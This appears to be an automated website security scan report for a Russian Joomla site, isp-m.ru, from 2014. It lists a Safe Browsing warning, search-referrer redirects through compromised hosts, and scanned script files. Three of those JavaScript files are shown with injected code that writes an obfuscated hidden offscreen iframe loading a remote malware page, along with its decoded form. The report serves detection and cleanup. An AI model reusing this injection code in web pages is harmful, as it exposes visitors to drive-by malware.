Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=isp-m.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://isp-m.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: isp-m.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 24 Sep 2014 01:31:24 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.6.0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.10 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 24 Sep 2014 01:31:24 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
Scanned pages/files
Request | Server response | Status |
http://isp-m.ru/ | 200 OK Content-Length: 28168 Content-Type: text/html | clean |
http://isp-m.ru/media/system/js/core.js | 200 OK Content-Length: 6295 Content-Type: application/x-javascript | clean |
http://isp-m.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 2043 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom } if (!funcionUA()) { var cookie = getCookie('uefaye18fjeo328rf7ajhe'); if (cookie == undefined) { setCookie('uefaye18fjeo328rf7ajhe', true, 172803); document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>'); } }; })(); Decoded script: <iframe name="Fulebraga" src="http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://isp-m.ru/media/system/js/caption.js | 200 OK Content-Length: 2870 Content-Type: application/x-javascript | clean |
http://isp-m.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 2043 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom } if (!funcionUA()) { var cookie = getCookie('uefaye18fjeo328rf7ajhe'); if (cookie == undefined) { setCookie('uefaye18fjeo328rf7ajhe', true, 172803); document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>'); } }; })(); Decoded script: <iframe name="Fulebraga" src="http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://isp-m.ru/cache/widgetkit/widgetkit-1a3c4ef4.js | 200 OK Content-Length: 16725 Content-Type: application/x-javascript | clean |
http://isp-m.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 2048 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom } if (!funcionUA()) { var cookie = getCookie('uefaye18fjeo328rf7ajhe'); if (cookie == undefined) { setCookie('uefaye18fjeo328rf7ajhe', true, 172803); document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>'); } }; })(); Decoded script: <iframe name="Fulebraga" src="http://granate.healthcaters.com/hredgtewgdgrehreh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://isp-m.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 23871 Content-Type: application/x-javascript | clean |
http://isp-m.ru/plugins/system/rokbox/themes/mynxx/rokbox-config.js | 200 OK Content-Length: 2599 Content-Type: application/x-javascript | clean |
http://isp-m.ru/templates/beez5/javascript/md_stylechanger.js | 200 OK Content-Length: 4174 Content-Type: application/x-javascript | clean |
http://isp-m.ru/modules/mod_swmenufree/transmenu_Packed.js | 200 OK Content-Length: 19640 Content-Type: application/x-javascript | clean |
http://isp-m.ru/templates/beez5/javascript/hide.js | 200 OK Content-Length: 9805 Content-Type: application/x-javascript | clean |
http://isp-m.ru/index.php/nashi-uslugi/stroitelstvo | 200 OK Content-Length: 26769 Content-Type: text/html | clean |
http://isp-m.ru/index.php/nashi-uslugi/ | 200 OK Content-Length: 26545 Content-Type: text/html | clean |
http://isp-m.ru/index.php/nashi-uslugi/energetika | 200 OK Content-Length: 34086 Content-Type: text/html | clean |